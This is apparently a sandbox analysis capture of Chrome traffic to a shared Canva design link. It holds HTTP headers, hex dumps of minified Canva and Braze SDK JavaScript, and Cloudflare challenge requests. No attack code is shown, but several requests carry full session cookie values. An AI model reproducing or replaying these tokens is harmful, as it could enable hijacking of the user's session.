                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1369INData Raw: 7b 61 3d 74 68 69 73 2e 73 74 6f 72 65 2e 64 65 6c 65 74 65 28 61 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 6b 69 28 61 29 7d 61 73 79 6e 63 20 63 6c 65 61 72 28 29 7b 63 6f 6e 73 74 20 61 3d 74 68 69 73 2e 73 74 6f 72 65 2e 63 6c 65 61 72 28 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 6b 69 28 61 29 7d 61 73 79 6e 63 20 67 65 74 41 6c 6c 28 61 2c 62 29 7b 61 3d 74 68 69 73 2e 73 74 6f 72 65 2e 67 65 74 41 6c 6c 28 61 2c 62 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 6b 69 28 61 29 7d 61 73 79 6e 63 20 67 65 74 41 6c 6c 4b 65 79 73 28 61 2c 62 29 7b 61 3d 74 68 69 73 2e 73 74 6f 72 65 2e 67 65 74 41 6c 6c 4b 65 79 73 28 61 2c 62 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 6b 69 28 61 29 7d 61 73 79 6e 63 20 63 6f 75 6e 74 28 61 29 7b 61 3d 74 68 69 73 2e 73 74
                                                                                                                                                                                                                                                    Data Ascii: {a=this.store.delete(a);return this.ki(a)}async clear(){const a=this.store.clear();return this.ki(a)}async getAll(a,b){a=this.store.getAll(a,b);return this.ki(a)}async getAllKeys(a,b){a=this.store.getAllKeys(a,b);return this.ki(a)}async count(a){a=this.st


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    36192.168.2.449779104.16.103.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:29 UTC1919OUTGET /_ajax/csrf3/ae HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    X-Canva-Brand: BAAAAAAAAAA
                                                                                                                                                                                                                                                    X-Canva-App: responsive_design_viewer
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    X-Canva-Build-Sha: e404dd6
                                                                                                                                                                                                                                                    X-Canva-User: UAAAAAAAAAA
                                                                                                                                                                                                                                                    X-Canva-Analytics: AAQAA1dFQgAA
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    X-Canva-Request: recordanalyticseventbatch
                                                                                                                                                                                                                                                    sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                    X-Canva-Locale: en
                                                                                                                                                                                                                                                    X-Canva-Build-Name: 20241217-21
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/design/DAGZxEJMIA0/pFi0b1a1Y78oAGDuII8Hjg/view?utm_content=DAGZxEJMIA0&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=hdcdec8ed4a
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: CDI=04b60d8a-0afb-4ec1-9086-045d7e0ec7dd; CPA=cnvanTz1hOxPVUJgop6_IlmuWwa-NtyfWx2O1ceJGGLF020n1ZV1iKl7wwDbWBY1Z5UjC1zWarjFNtvOsTB9ze88FeebuPUzY_v79VpdqxDEtzLk9WJhLeSQQjH7JN6qNs-Wtc6o7zrq2JaxSKJ8fHuCDlyVjZdk-rMvs92E0iCq3Z4e_Ddaw8ql5C7MfUKyYgGsGiVJjn3AbdJRGWNuAOZuRWS1q9P0RyLvZo6y3BpPPawIZcZBR6IG9jF176jVnVHy8rFl75lXO4qS_AEGcl534B5JhWxjJqIBv8qqSSKzICruOChEyLtZQbqiZYNoH_EsNTC2n3egVJXzYG-VSbcKWyiEOPkya2G12OS0p-zdBS6xGrr1f720lFYes8MQuJrJu7esh07zUdQtvmvxWQR1vWUuxrmnxfZZMFEwzJPOQXZL6A7VX3oRNQCb1Kzf0dJnvmOj6qoLIrdZzZXvRU96Dlzm6I9fzkJh0nMUj609KEEKP28z8jIw5ITGlSaSLeAalv51mKABcq9K8DNq1VX_wz7_VcUr_Sjqabe-VYjoRVD1Z4JInkjYHE6xUUNellFfFr9r3Bw15690698; CCK=a_O3O23kihyJVif7Fk2gFQ; __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; ASI=01JFGD2YV02D5APP1T8YZ7689M
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1081INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:30 GMT
                                                                                                                                                                                                                                                    Content-Type: text/javascript;charset=utf-8
                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7a1c0ab1439d-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                    Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                    Pragma: No-cache
                                                                                                                                                                                                                                                    accept-ch: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                    content-security-policy: frame-ancestors 'self' https://canvateam.zendesk.com https://phoenix.canva.com https://www.canva-iris.com;
                                                                                                                                                                                                                                                    referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                                                    x-frame-options: sameorigin
                                                                                                                                                                                                                                                    x-request-id: 8f4a7a1c0ab1439d
                                                                                                                                                                                                                                                    x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M45vSobMkzlNDtN%2BW%2FMwnERPJ4wwyp%2B%2BzgjLObvtTxRosWuuCbA4xqCA9xam08zGG2hcUcPrOLliUpxqO3%2FZkAbppnKWJ2ouQMTVqaaWLANLS3u1yf0uwJIQmkkzh7U%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC143INData Raw: 38 39 0d 0a 27 22 5d 29 7d 77 68 69 6c 65 28 31 29 3b 3c 2f 78 3e 2f 2f 7b 22 41 22 3a 22 59 7a 79 31 75 44 30 49 39 47 54 5f 42 39 79 70 5a 62 62 51 47 4b 30 72 35 71 4f 6c 49 63 51 5f 50 65 71 70 75 64 6c 64 4f 38 49 64 4d 61 6f 43 6d 42 6f 53 76 62 72 6c 33 48 68 36 42 39 47 4c 31 67 79 4f 4f 75 50 49 4e 61 41 36 6b 6b 34 66 56 39 75 50 75 6b 74 4f 37 62 73 22 2c 22 42 22 3a 31 37 33 34 36 35 30 38 35 30 30 34 34 7d 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 89'"])}while(1);</x>//{"A":"Yzy1uD0I9GT_B9ypZbbQGK0r5qOlIcQ_PeqpudldO8IdMaoCmBoSvbrl3Hh6B9GL1gyOOuPINaA6kk4fV9uPuktO7bs","B":1734650850044}
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    37192.168.2.449781104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:29 UTC622OUTGET /web/f0398d1166314304.vendor.js HTTP/1.1
                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:30 GMT
                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                    Content-Length: 115121
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7a1da9357285-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Age: 1946699
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                    ETag: "cb1826af86c8190ceb1ff4f70e255c6d"
                                                                                                                                                                                                                                                    Expires: Sat, 20 Dec 2025 03:16:16 GMT
                                                                                                                                                                                                                                                    Last-Modified: Wed, 23 Oct 2024 01:12:53 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 24 Oct 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                    x-amz-id-2: obf24c+YF9xXl/rmhD6WRszPq8SrqjFdUfGDh+41/JP3UlzybS/ZPUFJWgnDtmbusdkllCfDi2s=
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: BTKRNYJWXEZQPM2Y
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: 9Gmf.e8cCdjPD0iyMK2k7YgD6MdjsLKJ
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC352INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 67 52 57 34 44 62 66 71 66 4d 73 6b 6a 4a 6d 35 77 65 5a 63 53 44 46 58 37 6d 48 48 6d 6d 6c 62 4a 44 45 47 35 30 37 4c 65 25 32 46 4b 75 75 57 4e 25 32 42 50 31 52 42 75 6a 31 34 7a 55 70 41 6a 78 30 46 76 6d 51 35 68 47 74 46 71 45 72 55 76 36 6e 68 30 4c 32 4d 39 4a 25 32 46 44 6c 34 76 62 71 55 47 4c 73 25 32 46 63 50 6b 44 49 38 68 45 51 79 55 31 6a 50 6c 78 42 5a 6f 49 6b 6b 71 6d 44 49 6b 67 6a 59 45 36 73 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38
                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gRW4DbfqfMskjJm5weZcSDFX7mHHmmlbJDEG507Le%2FKuuWN%2BP1RBuj14zUpAjx0FvmQ5hGtFqErUv6nh0L2M9J%2FDl4vbqUGLs%2FcPkDI8hEQyU1jPlxBZoIkkqmDIkgjYE6s%3D"}],"group":"cf-nel","max_age":6048
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1369INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 31 33 36 5d 2c 7b 38 39 39 31 37 31 3a 28 74 2c 65 2c 69 29 3d 3e 7b 69 2e 64 28 65 2c 7b 5a 3a 28 29 3d 3e 73 7d 29 3b 63 6f 6e 73 74 20 73 3d 7b 54 6e 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 63 6f 6e 73 74 20 65 3d 28 74 2b 22 3d 22 2e 72 65 70 65 61 74 28 28 34 2d 74 2e 6c 65 6e 67 74 68 25 34 29 25 34 29 29 2e 72 65 70 6c 61 63 65 28 2f 5c 2d 2f 67 2c 22 2b 22 29 2e 72 65 70 6c 61 63 65 28 2f 5f 2f 67 2c 22 2f 22 29 2c 69 3d 61 74 6f 62 28 65 29 2c 73 3d 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 69 2e 6c
                                                                                                                                                                                                                                                    Data Ascii: "use strict";(self.webpackChunk_canva_web=self.webpackChunk_canva_web||[]).push([[5136],{899171:(t,e,i)=>{i.d(e,{Z:()=>s});const s={Tn:function(t){const e=(t+"=".repeat((4-t.length%4)%4)).replace(/\-/g,"+").replace(/_/g,"/"),i=atob(e),s=new Uint8Array(i.l
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1369INData Raw: 6d 65 26 26 65 2e 72 75 6e 74 69 6d 65 2e 69 64 29 72 65 74 75 72 6e 20 74 68 69 73 2e 76 64 2e 69 6e 66 6f 28 22 4e 6f 74 20 75 73 69 6e 67 20 49 6e 64 65 78 65 64 44 42 20 66 6f 72 20 73 74 6f 72 61 67 65 20 62 65 63 61 75 73 65 20 77 65 20 61 72 65 20 72 75 6e 6e 69 6e 67 20 69 6e 73 69 64 65 20 61 6e 20 65 78 74 65 6e 73 69 6f 6e 22 29 2c 21 31 7d 72 65 74 75 72 6e 21 30 7d 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 76 64 2e 69 6e 66 6f 28 22 4e 6f 74 20 75 73 69 6e 67 20 49 6e 64 65 78 65 64 44 42 20 66 6f 72 20 73 74 6f 72 61 67 65 20 64 75 65 20 74 6f 20 66 6f 6c 6c 6f 77 69 6e 67 20 65 72 72 6f 72 3a 20 22 2b 74 29 2c 21 31 7d 7d 42 64 28 74 2c 65 29 7b 76 61 72 20 69 3b 63 6f 6e 73 74 20 73 3d 6e 75 6c 6c 3d 3d 3d 28 69 3d
                                                                                                                                                                                                                                                    Data Ascii: me&&e.runtime.id)return this.vd.info("Not using IndexedDB for storage because we are running inside an extension"),!1}return!0}}catch(t){return this.vd.info("Not using IndexedDB for storage due to following error: "+t),!1}}Bd(t,e){var i;const s=null===(i=
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1369INData Raw: 6e 20 69 6e 64 65 78 65 64 44 42 20 22 2b 72 2e 64 61 74 61 62 61 73 65 2e 53 64 2b 22 20 2d 20 22 2b 74 2b 22 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 6f 62 6a 65 63 74 53 74 6f 72 65 22 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6e 26 26 6e 28 29 2c 76 6f 69 64 20 6f 2e 63 6c 6f 73 65 28 29 3b 63 6f 6e 73 74 20 61 3d 6f 2e 74 72 61 6e 73 61 63 74 69 6f 6e 28 5b 74 5d 2c 22 72 65 61 64 77 72 69 74 65 22 29 3b 61 2e 6f 6e 63 6f 6d 70 6c 65 74 65 3d 28 29 3d 3e 6f 2e 63 6c 6f 73 65 28 29 3b 63 6f 6e 73 74 20 75 3d 61 2e 6f 62 6a 65 63 74 53 74 6f 72 65 28 74 29 2e 70 75 74 28 69 2c 65 29 3b 75 2e 6f 6e 65 72 72 6f 72 3d 28 29 3d 3e 7b 72 2e 76 64 2e 65 72 72 6f 72 28 22 43 6f 75 6c 64 20 6e 6f 74 20 73 74 6f 72 65 20 6f 62 6a 65
                                                                                                                                                                                                                                                    Data Ascii: n indexedDB "+r.database.Sd+" - "+t+" is not a valid objectStore"),"function"==typeof n&&n(),void o.close();const a=o.transaction([t],"readwrite");a.oncomplete=()=>o.close();const u=a.objectStore(t).put(i,e);u.onerror=()=>{r.vd.error("Could not store obje
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1369INData Raw: 65 72 72 6f 72 28 22 43 6f 75 6c 64 20 6e 6f 74 20 6f 70 65 6e 20 63 75 72 73 6f 72 20 66 6f 72 20 22 2b 74 2b 22 20 6f 6e 20 69 6e 64 65 78 65 64 44 42 20 22 2b 73 2e 64 61 74 61 62 61 73 65 2e 53 64 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 26 26 69 28 29 7d 2c 6f 2e 6f 6e 73 75 63 63 65 73 73 3d 74 3d 3e 7b 76 61 72 20 73 3b 63 6f 6e 73 74 20 6e 3d 6e 75 6c 6c 3d 3d 3d 28 73 3d 74 2e 74 61 72 67 65 74 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 73 3f 76 6f 69 64 20 30 3a 73 2e 72 65 73 75 6c 74 3b 6e 75 6c 6c 21 3d 6e 26 26 6e 75 6c 6c 21 3d 6e 2e 76 61 6c 75 65 26 26 6e 75 6c 6c 21 3d 6e 2e 6b 65 79 3f 65 28 6e 2e 6b 65 79 2c 6e 2e 76 61 6c 75 65 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 26 26 69 28 29 7d 7d 29
                                                                                                                                                                                                                                                    Data Ascii: error("Could not open cursor for "+t+" on indexedDB "+s.database.Sd),"function"==typeof i&&i()},o.onsuccess=t=>{var s;const n=null===(s=t.target)||void 0===s?void 0:s.result;null!=n&&null!=n.value&&null!=n.key?e(n.key,n.value):"function"==typeof i&&i()}})
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1369INData Raw: 2e 64 65 6c 65 74 65 28 73 2e 6b 65 79 29 2e 6f 6e 73 75 63 63 65 73 73 3d 28 29 3d 3e 7b 61 2e 70 75 73 68 28 73 2e 76 61 6c 75 65 29 7d 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 73 2e 63 6f 6e 74 69 6e 75 65 26 26 73 2e 63 6f 6e 74 69 6e 75 65 28 29 29 3a 61 2e 6c 65 6e 67 74 68 3e 30 26 26 65 28 61 29 7d 7d 29 29 7d 63 6c 65 61 72 44 61 74 61 28 29 7b 69 66 28 21 74 68 69 73 2e 69 73 53 75 70 70 6f 72 74 65 64 28 29 29 72 65 74 75 72 6e 21 31 3b 63 6f 6e 73 74 20 74 3d 5b 5d 3b 66 6f 72 28 63 6f 6e 73 74 20 69 20 69 6e 20 74 68 69 73 2e 64 61 74 61 62 61 73 65 2e 73 73 29 7b 63 6f 6e 73 74 20 65 3d 69 3b 74 68 69 73 2e 64 61 74 61 62 61 73 65 2e 73 73 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 69 29 26 26 74 68 69 73 2e 64 61
                                                                                                                                                                                                                                                    Data Ascii: .delete(s.key).onsuccess=()=>{a.push(s.value)}),"function"==typeof s.continue&&s.continue()):a.length>0&&e(a)}}))}clearData(){if(!this.isSupported())return!1;const t=[];for(const i in this.database.ss){const e=i;this.database.ss.hasOwnProperty(i)&&this.da
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1369INData Raw: 20 22 2b 74 3b 6e 75 6c 6c 21 3d 73 2e 76 64 3f 73 2e 76 64 28 65 29 3a 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 65 29 7d 7d 2c 77 61 72 6e 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 73 2e 7a 67 29 7b 63 6f 6e 73 74 20 65 3d 22 42 72 61 7a 65 20 53 44 4b 20 57 61 72 6e 69 6e 67 3a 20 22 2b 74 2b 22 20 28 76 35 2e 33 2e 30 29 22 3b 6e 75 6c 6c 21 3d 73 2e 76 64 3f 73 2e 76 64 28 65 29 3a 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 65 29 7d 7d 2c 65 72 72 6f 72 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 73 2e 7a 67 29 7b 63 6f 6e 73 74 20 65 3d 22 42 72 61 7a 65 20 53 44 4b 20 45 72 72 6f 72 3a 20 22 2b 74 2b 22 20 28 76 35 2e 33 2e 30 29 22 3b 6e 75 6c 6c 21 3d 73 2e 76 64 3f 73 2e 76 64 28 65 29 3a 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 65 29 7d 7d 7d
                                                                                                                                                                                                                                                    Data Ascii: "+t;null!=s.vd?s.vd(e):console.log(e)}},warn:function(t){if(s.zg){const e="Braze SDK Warning: "+t+" (v5.3.0)";null!=s.vd?s.vd(e):console.warn(e)}},error:function(t){if(s.zg){const e="Braze SDK Error: "+t+" (v5.3.0)";null!=s.vd?s.vd(e):console.error(e)}}}
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1369INData Raw: 74 75 72 6e 3b 63 6f 6e 73 74 20 69 3d 73 2e 5a 50 2e 63 72 28 29 3b 69 26 26 69 2e 63 68 61 6e 67 65 55 73 65 72 28 74 2e 74 6f 53 74 72 69 6e 67 28 29 2c 73 2e 5a 50 2e 67 72 28 29 2c 65 29 7d 7d 2c 31 39 35 30 38 38 3a 28 74 2c 65 2c 69 29 3d 3e 7b 69 2e 64 28 65 2c 7b 6f 3a 28 29 3d 3e 72 7d 29 3b 76 61 72 20 73 3d 69 28 32 33 32 35 35 36 29 2c 6e 3d 69 28 31 32 36 38 39 32 29 3b 66 75 6e 63 74 69 6f 6e 20 72 28 29 7b 6e 2e 5a 2e 69 6e 66 6f 28 22 44 65 73 74 72 6f 79 69 6e 67 20 42 72 61 7a 65 20 69 6e 73 74 61 6e 63 65 22 29 2c 73 2e 5a 50 2e 64 65 73 74 72 6f 79 28 21 30 29 7d 7d 2c 36 34 33 36 33 38 3a 28 74 2c 65 2c 69 29 3d 3e 7b 69 2e 64 28 65 2c 7b 5a 3a 28 29 3d 3e 73 7d 29 3b 63 6f 6e 73 74 20 73 3d 7b 42 52 4f 57 53 45 52 3a 22 62 72 6f 77
                                                                                                                                                                                                                                                    Data Ascii: turn;const i=s.ZP.cr();i&&i.changeUser(t.toString(),s.ZP.gr(),e)}},195088:(t,e,i)=>{i.d(e,{o:()=>r});var s=i(232556),n=i(126892);function r(){n.Z.info("Destroying Braze instance"),s.ZP.destroy(!0)}},643638:(t,e,i)=>{i.d(e,{Z:()=>s});const s={BROWSER:"brow
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1369INData Raw: 29 2e 63 6c 65 61 72 44 61 74 61 28 29 7d 69 66 28 73 2e 5a 50 2e 58 28 29 29 66 6f 72 28 63 6f 6e 73 74 20 69 20 6f 66 20 73 2e 5a 50 2e 67 72 28 29 29 69 2e 63 6c 65 61 72 44 61 74 61 28 21 30 29 7d 7d 2c 38 34 32 34 31 37 3a 28 74 2c 65 2c 69 29 3d 3e 7b 69 2e 64 28 65 2c 7b 43 3a 28 29 3d 3e 72 2c 4e 3a 28 29 3d 3e 6f 7d 29 3b 76 61 72 20 73 3d 69 28 31 32 36 38 39 32 29 2c 6e 3d 69 28 34 37 31 30 33 31 29 3b 66 75 6e 63 74 69 6f 6e 20 72 28 74 29 7b 69 66 28 74 5b 6e 2e 5a 2e 52 74 2e 68 74 5d 26 26 22 62 6f 6f 6c 65 61 6e 22 3d 3d 74 79 70 65 6f 66 20 74 5b 6e 2e 5a 2e 52 74 2e 6c 65 5d 29 72 65 74 75 72 6e 20 6e 65 77 20 6e 2e 5a 28 74 5b 6e 2e 5a 2e 52 74 2e 68 74 5d 2c 74 5b 6e 2e 5a 2e 52 74 2e 6c 65 5d 2c 74 5b 6e 2e 5a 2e 52 74 2e 70 65 5d 2c
                                                                                                                                                                                                                                                    Data Ascii: ).clearData()}if(s.ZP.X())for(const i of s.ZP.gr())i.clearData(!0)}},842417:(t,e,i)=>{i.d(e,{C:()=>r,N:()=>o});var s=i(126892),n=i(471031);function r(t){if(t[n.Z.Rt.ht]&&"boolean"==typeof t[n.Z.Rt.le])return new n.Z(t[n.Z.Rt.ht],t[n.Z.Rt.le],t[n.Z.Rt.pe],
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1369INData Raw: 6f 74 20 6f 66 20 74 79 70 65 20 24 7b 74 7d 2e 60 29 7d 79 65 28 74 29 7b 73 2e 5a 2e 69 6e 66 6f 28 60 24 7b 74 7d 20 6e 6f 74 20 66 6f 75 6e 64 20 69 6e 20 66 65 61 74 75 72 65 20 66 6c 61 67 20 70 72 6f 70 65 72 74 69 65 73 2e 60 29 7d 62 65 28 74 29 7b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 3d 3d 3d 74 2e 74 79 70 65 26 26 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 2e 76 61 6c 75 65 7d 49 65 28 74 29 7b 72 65 74 75 72 6e 22 6e 75 6d 62 65 72 22 3d 3d 3d 74 2e 74 79 70 65 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 74 2e 76 61 6c 75 65 7d 64 65 28 74 29 7b 72 65 74 75 72 6e 22 62 6f 6f 6c 65 61 6e 22 3d 3d 3d 74 2e 74 79 70 65 26 26 22 62 6f 6f 6c 65 61 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e 76 61 6c 75 65 7d 54 65 28 74 29
                                                                                                                                                                                                                                                    Data Ascii: ot of type ${t}.`)}ye(t){s.Z.info(`${t} not found in feature flag properties.`)}be(t){return"string"===t.type&&"string"==typeof t.value}Ie(t){return"number"===t.type&&"number"==typeof t.value}de(t){return"boolean"===t.type&&"boolean"==typeof t.value}Te(t)


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    38192.168.2.449782104.16.103.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:29 UTC1497OUTGET /cdn-cgi/challenge-platform/h/b/scripts/jsd/787bc399e22f/main.js? HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
